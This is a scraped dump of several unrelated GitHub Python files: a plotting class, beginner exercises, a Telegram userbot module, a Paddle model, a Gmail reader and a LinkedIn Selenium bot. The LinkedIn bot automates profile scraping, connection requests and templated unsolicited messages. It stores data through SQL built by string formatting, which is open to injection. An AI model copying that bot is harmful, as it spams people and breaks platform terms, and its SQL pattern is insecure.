iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"green\", alpha=1, animated=False)\n\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"pink\", alpha=1, animated=False)\n\n if (0 < len(iSimulatorSamples)):\n # Simulator's sentiments on self and other, goldenrod and blue respectively\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"goldenrod\", alpha=1, animated=False)\n\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"blue\", alpha=1, animated=False)\n\n\n self.m_Axes.set_xlabel(cEPAConstants.m_EPALabels[self.m_XAxisItem])\n self.m_Axes.set_ylabel(cEPAConstants.m_EPALabels[self.m_YAxisItem])\n self.m_Axes.set_zlabel(cEPAConstants.m_EPALabels[self.m_ZAxisItem])\n self.redrawAxes()\n","repo_name":"tracydou/EmotionalHandwashingAssistant","sub_path":"lib/bayesact/gui/cPlotEPA3D.py","file_name":"cPlotEPA3D.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"12996778931","text":"l1=[]\nn1=int(input(\"\"))\nfor i in range(0,n1):\n a=int(input(\" \"))\n l1.append(a)\nopt=int(input(\"1.delete \\n 2.Insert\"))\nif opt==2:\n a=int(input(\" index value\"))\n b=input(\"value \")\n l1.insert(a,b)\nelse:\n op=int(input(\" 1.delete by value \\n 2. delete by index \\n 3.delete range\"))\n if(op==1):\n k=input(\"enter you want to delete\")\n l1.remove(k)\n elif op==2:\n k=int(input(\"enter index\"))\n del l1[k]\n else:\n st=int(input(\"strating index\"))\n ed=int(input(\"ending value\"))\n for i in range(st,ed+1):\n del l1[i]\n\n\nprint(l1)","repo_name":"Anubhavpandey27/Python_for_ds_assignment","sub_path":"assignment 1/answer 4.py","file_name":"answer 4.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"13753823034","text":"# █ █ █ █▄▀ ▄▀█ █▀▄▀█ █▀█ █▀█ █ █\n# █▀█ █ █ █ █▀█ █ ▀ █ █▄█ █▀▄ █▄█\n\n# 🔒 Licensed under the GNU GPLv3\n# 🌐 https://www.gnu.org/licenses/agpl-3.0.html\n# 👤 https://t.me/hikamoru\n\n# meta developer: @hikamorumods\n# meta banner: https://raw.githubusercontent.com/AmoreForever/assets/master/DTWR.jpg\n\nfrom .. import loader, utils\nfrom telethon.tl.types import Message\n\n\n@loader.tds\nclass DTWRMod(loader.Module):\n \"\"\"Module Don't tag wihout reason\"\"\"\n\n strings = {\n \"name\": \"DTWR\",\n \"text\": \"Your custom text\",\n \"username\": \"Input you username without '@'\",\n }\n\n strings_ru = {\n \"text\": \"Кастомный текст\",\n \"username\": \"Введи свой юзернэйм без '@'\",\n }\n\n strings_uz = {\n \"text\": \"Kastom text\",\n \"username\": \"Usernameingizni kiriting, '@' siz\"\n }\n\n def __init__(self):\n self.config = loader.ModuleConfig(\n loader.ConfigValue(\n \"Username\",\n \"username\",\n doc=lambda: self.strings(\"username\"),\n ),\n loader.ConfigValue(\n \"custom_text\",\n \"😫 Please don't tag me without reason\",\n doc=lambda: self.strings(\"text\"),\n ),\n )\n\n @loader.command(ru_docs=\"Конфиг этого модуля\")\n async def cfgdtwrcmd(self, message):\n \"\"\"This module config\"\"\"\n name = self.strings(\"name\")\n await self.allmodules.commands[\"config\"](\n await utils.answer(message, f\"{self.get_prefix()}config {name}\")\n )\n\n @loader.tag(\"only_messages\", \"only_groups\", \"in\")\n async def watcher(self, message: Message):\n\n reply = await message.get_reply_message()\n\n tag = self.config['Username']\n if tag.startswith('@') is False:\n tag = f\"@{tag}\"\n\n if reply:\n return False\n if message.text.lower() == tag:\n await message.reply(self.config[\"custom_text\"])\n await self._client.send_read_acknowledge(\n message.chat_id,\n clear_mentions=True,\n )\n","repo_name":"AmoreForever/amoremods","sub_path":"dtwr.py","file_name":"dtwr.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"38"}
+{"seq_id":"22652870187","text":"import paddle\nimport paddle.nn as nn\n\nfrom .layers import Conv7x7\n# from utils.download import download_and_decompress\n# from ops.tlx_basic_pooling import tlx_MaxPool2d, tlx_MaxUnPool2d\n# from utils.load_model import restore_model, load, download_and_decompress\nfrom paddle2tlx.pd2tlx.utils import load_model_cdet\nCDNET_URLS = \"https://paddlers.bj.bcebos.com/pretrained/cd/levircd/weights/cdnet_levircd.pdparams\"\n\nclass CDNet(nn.Layer):\n \"\"\"\n The CDNet implementation based on PaddlePaddle.\n\n The original article refers to\n Pablo F. Alcantarilla, et al., \"Street-View Change Detection with Deconvolut\n ional Networks\"\n (https://link.springer.com/article/10.1007/s10514-018-9734-5).\n\n Args:\n in_channels (int): Number of bands of the input images.\n num_classes (int): Number of target classes.\n \"\"\"\n\n def __init__(self, in_channels, num_classes):\n super(CDNet, self).__init__()\n self.conv1 = Conv7x7(in_channels, 64, norm=True, act=True)\n self.pool1 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv2 = Conv7x7(64, 64, norm=True, act=True)\n self.pool2 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv3 = Conv7x7(64, 64, norm=True, act=True)\n self.pool3 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv4 = Conv7x7(64, 64, norm=True, act=True)\n self.pool4 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv5 = Conv7x7(64, 64, norm=True, act=True)\n self.upool4 = nn.MaxUnPool2D(2, 2)\n self.conv6 = Conv7x7(64, 64, norm=True, act=True)\n self.upool3 = nn.MaxUnPool2D(2, 2)\n self.conv7 = Conv7x7(64, 64, norm=True, act=True)\n self.upool2 = nn.MaxUnPool2D(2, 2)\n self.conv8 = Conv7x7(64, 64, norm=True, act=True)\n self.upool1 = nn.MaxUnPool2D(2, 2)\n self.conv_out = Conv7x7(64, num_classes, norm=False, act=False)\n\n def forward(self, t1, t2):\n x = paddle.concat([t1, t2], axis=1)\n x, ind1 = self.pool1(self.conv1(x))\n x, ind2 = self.pool2(self.conv2(x))\n x, ind3 = self.pool3(self.conv3(x))\n x, ind4 = self.pool4(self.conv4(x))\n x = self.conv5(self.upool4(x, ind4))\n x = self.conv6(self.upool3(x, ind3))\n x = self.conv7(self.upool2(x, ind2))\n x = self.conv8(self.upool1(x, ind1))\n return [self.conv_out(x)]\n\n\ndef _cdnet(pretrained=None, in_channels=6, num_classes=2):\n model = CDNet(in_channels=in_channels,num_classes=num_classes)\n if pretrained:\n model = load_model_cdet(model, CDNET_URLS, \"cdnet\")\n # weight_path = download_and_decompress(CDNET_URLS)\n # param = paddle.load(weight_path)\n # # print(len([k for k in param.keys()]))\n # model.load_dict(param)\n return model\n","repo_name":"tensorlayer/Paddle2TLX","sub_path":"pd_models/paddlerscd/models/cdnet.py","file_name":"cdnet.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"}
+{"seq_id":"45996324274","text":"\r\n\r\nprint(\"*********************************\")\r\nprint(\"*****Olá, Seja bem vindo(a)!*****\")\r\nprint(\"*********************************\")\r\nprint(\"Iremos te auxiliar no cálculo no seu planejamento financeiro!\")\r\nprint('Primeiramente precisamos de alguns dados:')\r\ndef calcular():\r\n while True:\r\n capital = float(input(\"Qual seu valor inicial?\"))\r\n taxa = float(input(\"Qual a taxa de juros da sua aplicação (em %)?\"))\r\n tempo = float(input(\"Por quantos meses seu capital estará sujeito a esse juros?\"))\r\n juros = taxa / 100\r\n\r\n print('Qual cálculo você deseja realizar?')\r\n calculo = int(input('[1] Juros Simples [2] Juros Compostos'))\r\n if (calculo == 1):\r\n simples = capital * juros * tempo\r\n print(f'Esse é o seu capital total: {simples}')\r\n elif (calculo == 2):\r\n composto = capital * (1 + juros) ** tempo\r\n print(f'Esse é o seu capital total: {composto}')\r\n else:\r\n print('Opção invalida! Tente novamente!')\r\n calcular()\r\n break\r\ndef nova_consulta():\r\n repetir = int(input('Deseja realizar uma nova consulta? [1] para SIM ou [2] para NÃO?'))\r\n if repetir == 1:\r\n calcular()\r\n elif repetir == 2:\r\n print('Até a próxima!')\r\n exit()\r\n else:\r\n print('Opção inválida, tente novamente!')\r\n nova_consulta()\r\n\r\ncalcular()\r\nnova_consulta()\r\n\r\n","repo_name":"vansmelof/calculadoradejuros","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"73817130670","text":"import logging\n\nimport gmail\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"googleapiclient\").setLevel(logging.ERROR)\nlogger = logging.getLogger('AutoReply')\n\n\ndef main():\n logger.info('AutoReply script started.')\n logger.info('Reading gmail messages')\n info_form_list = gmail.Gmail().read_messages()\n output_file = open('results.txt', 'w')\n for info_form in info_form_list:\n output_file.write(str(info_form))\n output_file.write('\\n<<<-------------->>>\\n')\n output_file.close()\n logger.info('Reading Gmail messages completed. Please check results.txt')\n\nif __name__ == '__main__':\n main()\n","repo_name":"jaideep-khadilkar/InfoProvider","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70570334191","text":"import os\nimport sys\nimport time \nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nimport lxml\nimport re\nimport sqlite3\nfrom sqlite3 import Error as DB_ERROR\nimport random\n\n# Import chromedriver.exe\nplatform = sys.platform\n\nif platform == \"linux\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"webdriver/linux/chromedriver.exe\")\n sys.path.append(\"/home/jarret/.local/lib/python3.6/site-packages/\")\nelif platform == \"win32\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), r\"webdriver\\windows\\chromedriver.exe\")\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException, WebDriverException\n\nclass LinkedIn_Bot:\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.current_page_source = None\n\n def __str__(self):\n return \"LinkedIn_Bot - Created By Jarret Laberdee - Class Object Created To Increase Reach Of Development Web On LinkedIn\"\n\n def create_browser(self):\n \"\"\"Creates a browser instance of webdriver.\"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--ignore-ssl-errors\")\n self.browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)\n\n def get_page_source(self):\n page = BeautifulSoup(self.browser.page_source, features='lxml')\n return page \n\n def close_browser(self):\n self.browser.close()\n\n def navigate_to_url(self, url, sleep_interval):\n self.browser.get(url)\n time.sleep(sleep_interval)\n\n def login(self):\n self.browser.find_element_by_id(\"login-email\").send_keys(self.username)\n self.browser.find_element_by_id(\"login-password\").send_keys(self.password)\n self.browser.find_element_by_id(\"login-submit\").click()\n time.sleep(2)\n\n def navigate_to_network(self):\n self.browser.find_element_by_id(\"mynetwork-tab-icon\").click()\n time.sleep(2)\n\n def compile_people_links(self, page):\n links = []\n for link in page.find_all('a'):\n url = link.get('href')\n if url:\n if '/in/' in url:\n if url not in links:\n links.append(url)\n return links\n\n def scroll_to_bottom(self, num_scrolls):\n \"\"\"Scrolls to the bottom of the page by executing Javascript\"\"\"\n\n SCROLL_PAUSE_TIME = 1.25\n scroll_height_cmd = \"window.scrollTo(0, document.body.scrollHeight);\"\n \n for page in range(num_scrolls):\n last_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n self.browser.execute_script(scroll_height_cmd)\n # self.browser.execute_script(\"alert('Scrolling')\")\n time.sleep(SCROLL_PAUSE_TIME)\n new_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n return\n last_height = new_height\n\n def store_people(self, url_list):\n people_list = []\n root_url = \"https://www.linkedin.com\"\n for person_object in url_list:\n split_person_object = person_object.replace(\"/\", \" \").replace(\"-\", \" \")\n split_person_object = split_person_object.split()\n person_url = root_url + person_object\n\n if split_person_object:\n if len(split_person_object) ==5:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = split_person_object[3]\n ID = split_person_object[4]\n if len(split_person_object) == 4:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = split_person_object[3]\n elif len(split_person_object) == 3:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = str(split_person_object[1]) + str(split_person_object[2])\n elif len(split_person_object) == 2:\n first_name = split_person_object[1]\n last_name = \"None\"\n certification = \"None\"\n\n person = {\n 'ID' : ID,\n 'first_name' : first_name,\n 'last_name' : last_name,\n 'certification' : certification, \n 'added' : False, \n 'URL' : person_url, \n 'position_desc' : 'None',\n 'job_potential' : False,\n 'messaged' : False\n }\n\n people_list.append(person)\n\n return people_list\n\n def open_database(self):\n ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n DB_PATH = os.path.join(ROOT_DIR, 'LinkedIn_People.db')\n\n try:\n db_connection = sqlite3.connect(DB_PATH)\n return db_connection\n except DB_ERROR as e:\n print(e)\n return None\n return None\n\n def database_write(self, people_list):\n db_connection = self.open_database()\n\n try:\n self.create_table(db_connection)\n db_connection.commit()\n self.append_people(people_list, db_connection)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n finally:\n db_connection.close()\n\n def create_table(self, db_connection):\n\n create_table = \"\"\" CREATE TABLE IF NOT EXISTS people (\n ID text PRIMARY KEY UNIQUE,\n first_name text NOT NULL,\n last_name text NOT NULL, \n certification text, \n added boolean, \n URL text NOT NULL, \n position_desc text,\n job_potential boolean,\n messaged boolean\n ) \"\"\"\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(create_table)\n except DB_ERROR as e:\n print(e)\n\n def append_people(self, people_list, db_connection):\n \n try:\n db_cursor = db_connection.cursor()\n\n for person in people_list:\n columns = ', '.join(person.keys())\n values = \"'{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}'\".format(str(person[\"ID\"]), str(person[\"first_name\"]), str(person[\"last_name\"]), str(person[\"certification\"]), person[\"added\"], person[\"URL\"], person[\"position_desc\"], person[\"job_potential\"], person[\"messaged\"])\n # values = ''\n command = 'INSERT INTO people ({}) VALUES({})'.format(columns, values)\n\n try:\n db_cursor.execute(command)\n except DB_ERROR as e:\n print(e)\n except DB_ERROR as e:\n print(e)\n\n def query_db(self, db_connection, select_condition):\n\n target_list = []\n\n statement = \"\"\"\n SELECT * FROM people WHERE {}\n \"\"\".format(select_condition)\n\n try: \n db_cursor = db_connection.cursor()\n db_cursor.execute(statement)\n\n entries = db_cursor.fetchall()\n\n for entry in entries:\n target_list.append(entry)\n\n return target_list\n \n except DB_ERROR as e:\n print(e)\n return\n\n except Exception as e:\n print(e)\n return \n\n def find_not_added(self, db_connection):\n \n try:\n not_added = self.query_db(db_connection, select_condition=\"added='False' AND messaged <> 'True'\" )\n return not_added\n except DB_ERROR as e:\n print(e)\n return \n\n def format_stored_people(self, people_not_yet_added):\n\n people = []\n\n random.shuffle(people_not_yet_added)\n\n for person in people_not_yet_added:\n person_url = person[5]\n person_id = person[0]\n\n person = {\n \"ID\" : person_id,\n \"URL\" : person_url\n }\n\n people.append(person)\n\n return people\n\n def add_friends(self, urls_and_ids, db_connection, num_profiles, add_mode):\n \n profiles_visited = 0\n\n while profiles_visited < num_profiles:\n for url_and_id in urls_and_ids:\n url = url_and_id[\"URL\"]\n ID = url_and_id[\"ID\"]\n self.navigate_to_url(url, random.uniform(3.5, 5.9))\n job_description = self.acquire_job_description()\n first_name, last_name = self.acquire_full_name()\n if add_mode:\n self.connect_to_person()\n self.update_person(url, db_connection, job_description)\n else:\n self.update_database(db_connection, \"SET position_desc = '{}', first_name = '{}', last_name = '{}'\".format(job_description, first_name, last_name), \"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {}'s job description updated to: {}\".format(first_name, last_name, ID, job_description))\n profiles_visited += 1\n\n def update_person(self, candidate_url, db_connection, job_description):\n\n split_url = candidate_url.replace(\"/\", \" \").replace(\"-\", \" \").split()\n \n if len(split_url) == 7:\n ID = split_url[5]\n elif len(split_url) == 6:\n ID = split_url[5]\n elif len(split_url) == 5:\n ID = str(split_url[3]) + str(split_url[4])\n elif len(split_url) == 4:\n ID = split_url[3]\n\n # Returns a DB entry of one person that hasn't been added yet\n # And hasn't been messaged yet\n person_not_connected = self.query_db(db_connection, select_condition=\"WHERE ID = '{}' AND added <> 'True' AND messaged <> 'True'\".format(ID))\n \n if person_not_connected:\n # Mark person as not connected in the DB\n self.update_database(db_connection, sql_set_command=\"SET added = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n\n else:\n # No entries were returned from the DB which means that \n # 1) Entry doesn't exist\n # 2) Entry has been added already\n # 3) Entry has been messaged already\n print(\"Person with the ID {} has already been added\".format(ID))\n\n def connect_to_person(self):\n\n try:\n # Click the connect button\n connect_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n connect_button.click()\n # Wait for browser to load\n time.sleep(2)\n # Click the 'Send now' button\n send_now_button = self.browser.find_element_by_xpath(\"//button[text()='Send now']\")\n send_now_button.click()\n print(\"Person added\")\n return True \n except NoSuchElementException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False \n except WebDriverException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n except Exception as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n\n def acquire_job_description(self):\n current_page = self.get_page_source()\n job_description_with_tags = current_page.find(\"h2\")\n job_description = job_description_with_tags.text\n job_description = str(job_description)\n job_description = job_description.replace(\"\\n\", \"\")\n formatted_js = re.sub(\"\\s\\s+\", \"\", job_description)\n return formatted_js\n\n def acquire_full_name(self):\n\n try:\n current_page = self.get_page_source()\n full_name_with_tags = current_page.find(\"h1\", {\"class\" : \"pv-top-card-section__name\"})\n full_name = full_name_with_tags.text\n full_name = str(full_name)\n full_name = full_name.replace(\"\\n\", \"\")\n full_name = re.sub(\"\\s\\s+\", \"\", full_name)\n split_name = full_name.split(\" \")\n if len(split_name) == 1:\n first_name = split_name[0]\n last_name = 'None'\n if len(split_name) == 2:\n first_name = split_name[0]\n last_name = split_name[1]\n elif len(split_name) > 2:\n first_name = split_name[0]\n last_name = split_name[len(split_name) - 1]\n\n except AttributeError as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n except Exception as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n\n return first_name, last_name\n\n\n def find_updated_job_descriptions(self, db_connection):\n\n matches = []\n\n # Find people who have a job description that haven't been messaged yet\n sql_job_description_command = \"position_desc <> 'None' AND messaged <> 'True'\"\n\n # Execute search in DB\n people_with_job_descriptions = self.query_db(db_connection, select_condition=sql_job_description_command)\n\n for person in people_with_job_descriptions:\n\n # Grab the 6th index of the resultant people from the db\n job_description = person[6]\n\n # Compare the resultant people against the text file for job keywords\n # and compare against the list of elimination keywords\n each_match = self.compare_desc_against_criteria(job_description, person)\n\n if each_match:\n matches.append(each_match)\n\n return matches\n\n\n def compare_desc_against_criteria(self, job_description, person):\n\n SEARCH_CRITERIA_TXT = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'txt/search_criteria.txt')\n \n matches = []\n\n ignore_criteria = [\n \"FCA\", \n \"FCA Fiat Chrysler Automobiles\",\n \"Jeep\",\n \"Operations\", \n \"DHL\", \n \"Chrysler\", \n \"Fiat\", \n \"Mopar\", \n \"Supply Chain\", \n \"WCM\", \n \"Logistics\", \n \"MLM\", \n \"Quality\",\n \"Retail\", \n \"Student\", \n \"Clerical\", \n \"Intern\", \n \"Sales\"\n ]\n \n # Open the text file where I have the keywords defined\n match_criteria = open(SEARCH_CRITERIA_TXT, 'r')\n\n job_description = str(job_description)\n \n for match_description in match_criteria:\n\n # Format the text file so we can iterate properly\n match_description = match_description.strip()\n match_description = match_description.replace(\" \", \"\")\n match_description = str(match_description)\n\n if match_description:\n\n # Read in the list of keywords that we want to ignore\n for ignore_description in ignore_criteria:\n\n # Format them so we can work with them\n ignore_description = ignore_description.replace(\" \", \"\")\n ignore_description = str(ignore_description)\n\n # If the target keyword is in their job description\n if match_description in job_description:\n\n # If the name triggers the list of words we want to avoid\n if ignore_description in job_description:\n\n # throw it out\n return \n\n else:\n\n # If we haven't already added it, add it\n if person not in matches:\n\n if person:\n matches.append(person)\n\n match_criteria.close()\n return matches\n\n def get_matching_candidates(self, db_connection):\n\n candidates = []\n\n sql_search_command = \"WHERE job_potential = 'True' AND messaged = 'False'\"\n\n matching_candidates = self.query_db(db_connection, select_condition=sql_search_command)\n\n for candidate in matching_candidates:\n if candidate:\n candidates.append(candidate)\n\n return candidate\n\n\n def message_candidates(self, candidates):\n\n for candidate in candidates:\n ID = candidate[0]\n first_name = candidate[1]\n last_name = candidate[2]\n candidate_url = candidate[5]\n\n if candidate_url:\n self.navigate_to_url(candidate_url, 2)\n page = self.get_page_source()\n\n span_text = page.find(\"span\", {\"class\": \"pv-s-profile-actions__label\"}).text\n if span_text == 'Message':\n self.send_message(ID, first_name, last_name)\n elif span_text == 'Pending':\n print(\"Connection Request is pending for {} {} with the ID {}. Proceeding to the next candidate\".format(first_name, last_name, ID))\n else:\n print(\"Another issue arose, proceeding to the next candidate\")\n\n def message_with_subject(self, first_name):\n\n first_name = first_name.title()\n\n subject = \"Hi {}\".format(first_name)\n\n message = \"\"\"My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n your profile stuck out to me. \n While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping \n hear from you {}! Have a nice day!\"\"\".format(first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return subject, message\n\n def message_no_subject(self, first_name):\n\n first_name = first_name.title()\n\n message = \"\"\"Hi {}. My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n your profile stuck out to me. \n While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping \n hear from you {}! Have a nice day!\"\"\".format(first_name, first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return message\n\n\n def send_message(self, ID, first_name, last_name):\n\n db_connection = self.open_database()\n\n premium_url = \"https://www.linkedin.com/premium/products\"\n\n send_message_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n send_message_button.click()\n\n time.sleep(2)\n\n current_url = self.browser.current_url\n\n if premium_url in current_url:\n print(\"Messaging {} {} with the ID {} has been forwarded to premium account URL, skipping to next candidate...\".format(first_name, last_name, ID))\n return \n else:\n \n time.sleep(1)\n\n # If there's no issue with the subject form, return a tuple from the format message function\n subject, message = self.message_with_subject(first_name)\n \n # Begin message with a subject line\n\n try:\n # Type the subject to the candidate\n message_form_subject = self.browser.find_element_by_class_name(\"msg-form__subject\")\n message_form_subject.send_keys(subject)\n\n except NoSuchElementException as e:\n\n # Begin message with no subject line\n\n print(e + \"\\nExecuting message with no subject function...\\n\")\n \n # If there's an issue with the subject form ie it's not there, returns a single string from the errored format\n message = self.message_no_subject(first_name)\n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n \n except NoSuchElementException as e:\n print(e + \"\\n\")\n pass\n \n except WebDriverException as e:\n print(e + \"\\n\")\n pass\n \n except Exception as e:\n print(e + \"\\n\")\n pass\n\n try:\n \n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n \n except NoSuchElementException as e:\n print(e)\n pass\n \n except WebDriverException as e:\n print(e)\n pass\n \n except Exception as e:\n print(e + \"\\n\")\n\n except WebDriverException as e:\n print(e + \"\\n\")\n return \n \n except Exception as e:\n print(e + \"\\n\")\n return \n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n self.update_database(db_connection, sql_set_command=\"SET messaged = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {} has been set to 'Messaged' in the database.\".format(first_name, last_name, ID))\n except Exception as e:\n print(e)\n\n db_connection.close()\n\n def update_database(self, db_connection, sql_set_command, sql_where_command):\n\n update_command = \"\"\"\n UPDATE people\n {} \n {}\n \"\"\".format(sql_set_command, sql_where_command)\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(update_command)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n return\n except Exception as e:\n print(e)\n return\n\n\n \n\n\n\n\n\n\n \n \n \n\n\n \n\n\n\n\n\n \n\n\n\n","repo_name":"CarnsJalone/LinkedIn_Bot","sub_path":"py_files/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":24298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"19229958256","text":"from aiogram.types import ChatMemberUpdated\nfrom sqlalchemy.orm import selectinload\n\nfrom bot.models import Group, User\nfrom bot.repositories.uow import UnitOfWork\n\n\nasync def invite_member(event: ChatMemberUpdated, uow: UnitOfWork):\n group = await uow.groups.get_by_id(event.chat.id, [selectinload(Group.users)])\n if group is None:\n group = Group(\n id=event.chat.id,\n title=event.chat.title\n )\n await uow.groups.create(group)\n\n user = await uow.groups.get_by_id(event.new_chat_member.user.id, [selectinload(User.groups)])\n if user is None:\n user = User(\n id=event.new_chat_member.user.id,\n username=f\"@{event.new_chat_member.user.username}\"\n if event.new_chat_member.user.username\n else event.new_chat_member.user.full_name\n )\n await uow.groups.create(user)\n\n group.users.append(user)\n","repo_name":"fictadvisor/fice-sc-bot","sub_path":"bot/routes/group/invite_member.py","file_name":"invite_member.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"39191267187","text":"\"\"\"\n제출 번호: 47362584\n아이디: adviate\n문제: 2204\n결과: 맞았습니다!!\n메모리: 30840 KB \n시간: 68 ms\n언어: Python 3\n코드 길이: 253 B\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nwhile(True):\n N = int(input())\n if N == 0:\n break\n\n dic = {}\n for i in range(N):\n s = input().rstrip()\n dic[s.lower()] = s\n\n tmp = sorted(list(dic.keys()))\n print(dic[tmp[0]])\n","repo_name":"kryowen/BaekJoon_Solution","sub_path":"PY/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
